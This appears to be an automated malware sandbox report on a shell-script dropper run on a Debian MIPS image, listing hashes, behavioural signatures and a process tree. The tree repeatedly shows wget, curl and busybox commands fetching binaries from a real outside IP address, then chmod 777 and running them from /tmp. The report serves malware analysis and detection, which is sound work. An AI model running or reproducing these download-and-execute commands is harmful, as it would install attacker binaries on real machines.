Analysis
-
max time kernel
127s -
max time network
132s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21-11-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
-
Size
10KB
-
MD5
a1defdb85efc4f43f3026f633f9d8642
-
SHA1
50c5a077d2f6661aae89e985d3ed38d1c6678db1
-
SHA256
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
-
SHA512
ccce629290ff01417dcfcaa9313b1d4fe996f2d0131a5e211a0d9b41c81883bc0aced8f92fce2e96cc8216fcd2be2d5c1703f77c54706880e444a2bbe868b459
-
SSDEEP
192:hhYH7jooSYSyovzbEXvHC+OU1RZEEhWsRH7jooECSyovzkXvHC+V1RZEEs:Pp1tOo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
Executes dropped EXE 28 IoCs
Processes:
Processes:
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
Processes
-
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:718
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:737
-
-
/bin/chmodchmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:746
-
-
/bin/chmodchmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:749
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:750
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:752
-
-
/bin/chmodchmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:758
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:759
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:774
-
-
/bin/chmodchmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:782
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:783
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:804
-
-
/bin/chmodchmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:813
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:814
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:818
-
-
/bin/chmodchmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:821
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:824
-
-
/bin/chmodchmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8./nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:830
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:831
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:845
-
-
/bin/chmodchmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:866
-
-
/bin/chmodchmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:872
-
-
/bin/chmodchmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:878
-
-
/bin/chmodchmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:884
-
-
/bin/chmodchmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:890
-
-
/bin/chmodchmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:896
-
-
/bin/chmodchmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:902
-
-
/bin/chmodchmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:908
-
-
/bin/chmodchmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:914
-
-
/bin/chmodchmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:920
-
-
/bin/chmodchmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:926
-
-
/bin/chmodchmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:932
-
-
/bin/chmodchmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:938
-
-
/bin/chmodchmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:944
-
-
/bin/chmodchmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:950
-
-
/bin/chmodchmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:956
-
-
/bin/chmodchmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:962
-
-
/bin/chmodchmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:968
-
-
/bin/chmodchmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8./nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:974
-
-
/bin/chmodchmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:980
-
-
/bin/chmodchmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97